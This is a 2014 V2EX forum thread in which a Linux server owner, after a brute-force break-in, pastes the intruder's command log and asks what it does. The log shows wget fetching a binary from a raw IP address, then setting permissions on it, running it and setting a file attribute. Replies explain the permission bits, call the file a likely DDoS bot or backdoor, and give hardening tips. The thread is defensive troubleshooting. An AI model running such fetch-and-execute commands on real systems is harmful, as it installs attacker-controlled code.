站点密码被暴力破解留下了操作记录，有几个命令不是太理解

wget http://122.224.32.32:51/prfos
chmod 7777 ./prfos
./prfos
chattr +s /tmp/prfos

chmod 7777是干嘛用的，一般不都是777吗？多的一位用意是？
prfos我看了下是二进制文件。后面直接运行后chattr是什么用意？
我现在改密码后将prfos删了能保证该代码不再运行了吗？
该主机从没设域名只有内部使用，黑客是如何扫描到的，并判断出该主机上有这个账号的？
=======
登录的两次ip
58.83.131.67 北京市世纪互联
60.190.139.34 浙江省嘉兴市电信

letitbesqzr

2014-06-27 16:38:43 +08:00

一般是批量集群ddos的马..

9hills

2014-06-27 16:50:20 +08:00

就不能重装下系统？删了继续跑，真是胆大

jamesxu

2014-06-27 16:53:01 +08:00

看这一章： http://vbird.dic.ksu.edu.tw/linux_basic/0220filemanager_4.php

loginv2

2014-06-27 17:02:51 +08:00

7777 setuid
prfos 估计是个后门之类的东西，对系统做了某些操作
然后彻底删除这个文件（用0填充掉）

loginv2

2014-06-27 17:04:07 +08:00

而且，因为有HTTP服务，所以被中途抓包或者登陆者机器的某些软件记录了操作也有可能薄弱环节无处不在

passluo

2014-06-27 17:05:24 +08:00

ddos马

yinjian

2014-06-27 17:34:27 +08:00

ubuntu下清ddos马有成熟点的方案没，比如类似win下的杀毒软件之类的工具？

wubaiqing

2014-06-27 18:45:10 +08:00

chmod 7777 特殊权限S

SBIT为1
只对目录有效，使目录下的文件，只有文件拥有者才能删除
如果他不属于owner，仅属于group或者other，就算他有w权限，也不能删除文件

SGID为2
表示运行这个程序时，是临时以这个文件的拥有组的身份运行的；
加上SGID的文件夹，表示在这个目录下创建的文件属于目录所有的组，而不是创建人所在的组，在这个目录下创建的目录继承本目录的SGID。

SUID为4
SUID与SGID是一样的，惟一不同的是，运行时是以这个文件的拥有者身份来运行。

wubaiqing

2014-06-27 18:48:41 +08:00

chattr +s /tmp/prfos

附加属性：
s：彻底删除文件，不可恢复。
因为是从磁盘上删除，然后用0填充文件所在区域。

xi4oh4o

2014-06-27 19:36:23 +08:00

检查一下 crontab -l

这个开源工具十分好用 http://rootkit.nl/projects/rootkit_hunter.html

tmqhliu

2014-06-27 23:52:34 +08:00

几点建议

修改SSH配置，不要在22端口上运行，否则容易被区段扫描，碰上弱密码就攻破了
SSH配置不得允许 root 直接登录，只能允许普通用户登录，然后用 su 切换用户
扫描显示有warning的文件，最好详细检查是否有问题，如果不能判断，一律认为有后门，果断找干净版本替换，甚至重装

halczy

2014-06-28 00:00:58 +08:00

@tmqhliu

非22端口SSH用久了会被GFW.

可以安装FAIL2BAN来自动封IP, 防止暴力破解.

johnnyR

2014-06-28 00:22:04 +08:00

@tmqhliu 我也很担心。我的是12.04版的。我还开了3389.我设置了密码22位= =不知道安全不

9hills

2014-06-28 00:31:51 +08:00

@halczy
@johnnyR
@tmqhliu 禁止密码登录，只用密钥，表示随便扫，什么failban完全不用。。

lyragosa

2014-06-28 00:33:39 +08:00

@halczy 我了个去，还有这个说法吗……

CupTools

2014-06-28 03:05:36 +08:00

改SSH口+CSF+OSSEC

这是一个专为移动设备优化的页面（即为了让你能够在 Google 搜索结果里秒开这个页面），如果你希望参与 V2EX 社区的讨论，你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/119848

V2EX 是创意工作者们的社区，是一个分享自己正在做的有趣事物、交流想法，可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.